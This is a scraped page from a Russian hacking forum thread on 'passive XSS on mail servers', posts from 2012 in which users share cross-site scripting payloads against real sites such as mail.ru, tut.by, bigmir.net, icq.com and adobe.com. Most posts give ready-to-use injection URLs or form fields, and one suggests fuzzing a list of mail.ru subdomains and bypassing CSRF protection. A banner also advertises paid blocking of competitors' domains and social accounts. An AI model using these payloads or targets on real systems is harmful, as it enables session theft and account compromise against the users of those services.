Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 23 из 25

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#221

26.02.2012, 13:41

GoodGoogle

Познавший АНТИЧАТ

Регистрация: 05.08.2011

Сообщений: 1,159

С нами: 7774166

Репутация: 226

Цитата:

Сообщение от Unix@

Не знаю почему у меня работает,честно.

Браузер обнови) попробуй.

#222

26.02.2012, 15:42

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Список 403 доменов на мейл.ру

если у кого есть желание могут поФаззить на скрипты

там дырявые есть 100%, парочку пасивок на прошлой неделе снял

Код:

http://aj.mail.ru
http://bs.mail.ru
http://dn.mail.ru
http://ff.mail.ru
http://fx.mail.ru
http://js.mail.ru
http://kp.mail.ru
http://ok.mail.ru
http://r1.mail.ru
http://r2.mail.ru
http://r3.mail.ru

#223

06.03.2012, 12:28

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Xss на Mail.ru

1. Заходим на страницу http://webagent.mail.ru/r/webagent/popup.html?branch=redesign-rc6.

2. Добавить Контакт

3.

Цитата:

Сообщение от None

4.Вставляем этот код в любое место

5.Нажимаем найти

#224

06.03.2012, 14:01

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

С нами: 11322426

Репутация: 0

Unix@, как эту XSS можно использовать на практике?

#225

11.03.2012, 03:00

mr.Penguin

Познающий

Регистрация: 08.03.2012

Сообщений: 40

С нами: 7463126

Репутация: 74

@bigmir.net

Тип уязвимости: Активная XSS

Находится в сервисе "Дневники".

Где найти?

Мой дневник => Заметки => Добавить заметкуУязвимое поле:

ТегиПример:

alert('xss')

#226

14.03.2012, 13:48

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

XSS на Mail.ru

Работает только у авторизованных.

Цитата:

Сообщение от None

http://moto.mail.ru/login.html?Page=javascript:alert('xss');

Нажать кнопкуПродолжить

#227

28.03.2012, 02:47

mr.Penguin

Познающий

Регистрация: 08.03.2012

Сообщений: 40

С нами: 7463126

Репутация: 74

Код:

http://vashdom.tut.by/search/?search=alert('xss')

#228

30.03.2012, 14:33

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

TUT.by

Пассивка TUT.by

Цитата:

Сообщение от None

http://slovari.tut.by/index.php?skeyword=">alert(0)">alert(0)

#229

31.03.2012, 00:38

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

icq.com

validate.icq.com/icq/validate.html?uid=1&sid=23">alert('XSS')&lang=en

adobe.com

store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type=">&code=adobe&cat=classification

#230

31.03.2012, 12:02

eclipse

Участник форума

Регистрация: 19.12.2010

Сообщений: 155

С нами: 8103926

Репутация: 85

Пассивка на ачате))

PR 5 | GI - 4 980 000 | CY 240 | 243 000

Античат конечно не почтовый сервис, но я думаю меня простят)))

http://video.antichat.ru/video/Номер видео/

Post запрос

Цитата:

Сообщение от None

author=">[XSS] или &comment=">[XSS]

Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка )

Страница 23 из 25

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход